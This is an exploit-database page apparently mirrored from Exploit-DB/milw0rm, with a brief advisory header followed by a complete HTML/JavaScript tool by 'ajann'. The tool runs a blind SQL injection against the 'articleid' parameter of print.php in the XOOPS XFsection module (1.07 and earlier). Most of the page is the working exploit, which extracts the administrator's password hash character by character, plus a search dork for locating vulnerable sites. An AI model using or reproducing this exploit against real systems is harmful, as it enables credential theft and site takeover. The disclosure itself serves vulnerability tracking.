XOOPS Module XFsection - exploit.company

vendor:
Module XFsection
by:
ajann
7.5
CVSS
HIGH
BLIND SQL Injection
CWE
Product Name: Module XFsection
Affected Version From: 1.07 or below
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the XOOPS Module XFsection version 1.07 or below. The vulnerability can be exploited by manipulating the 'articleid' parameter in the 'print.php' file. The exploit script sends a GET request to the target URL with the manipulated parameter, and checks the response for specific HTML tags to determine if the injection was successful or not.
Mitigation:

Upgrade to a patched version of the XOOPS Module XFsection.
Source
Exploit-DB raw data:

<html>
<head>
<title>XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[Dork       : inurl:/modules/xfsection/
//'[S.Page     : http://linux2.ohwada.net/
//'[$$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================


   function nesneyarat() {

 var nesne;
 var tarayici = navigator.appName;

   
     if(tarayici == "Microsoft Internet Explorer"){
 nesne = new ActiveXObject("Microsoft.XMLHTTP");
    }
  else {
 nesne = new XMLHttpRequest();

  }
return nesne;
}

 var http = nesneyarat();



   function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/modules/xfsection/print.php?articleid=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim +  adresyolla + karakterim


 

 http.open('get', adres);
 http.onreadystatechange = cevapFonksiyonu;
 http.send(null);
   

}



   function cevapFonksiyonu() {
 if(http.readyState == 4){
document.getElementById('mesaj').value = http.responseText;
yonlendir();

}
}



function yonlendir() {

  if (document.getElementById('mesaj').value.indexOf('<span style="font-size: large;">', 0) == -1) {
 alert('False');


  }

 if (document.getElementById('mesaj').value.indexOf('<span style="font-size: large;">', 0) != -1)  {
   alert('TRUEEEEEEE');
   }
 


  }

function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
   document.getElementById('buton').value = "Test Character(1)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(1)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
   document.getElementById('buton').value = "Test Character(2)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(2)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
   document.getElementById('buton').value = "Test Character(3)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(3)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
   document.getElementById('buton').value = "Test Character(4)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(4)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
   document.getElementById('buton').value = "Test Character(5)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(5)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
   document.getElementById('buton').value = "Test Character(6)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(6)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
   document.getElementById('buton').value = "Test Character(7)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(7)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
   document.getElementById('buton').value = "Test Character(8)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(8)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
   document.getElementById('buton').value = "Test Character(9)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(9)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
   document.getElementById('buton').value = "Test Character(a)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(a)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
   document.getElementById('buton').value = "Test Character(b)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(b)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
   document.getElementById('buton').value = "Test Character(c)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(c)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
   document.getElementById('buton').value = "Test Character(d)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(d)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
   document.getElementById('buton').value = "Test Character(e)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(e)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
   document.getElementById('buton').value = "Test Character(f)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(f)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
   document.getElementById('buton').value = "Finished"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }



  }


</script>

   </head>

 <body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</font></b></p>

<p></p>
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
  <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
  <p>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 
  Character 1-32]&nbsp;&nbsp; </font></b>
  <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p>
    <b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=]&nbsp;&nbsp; </font></b>
  <input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden">&lt;/textarea&gt; <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


 </body>
 </html>

# milw0rm.com [2007-04-02]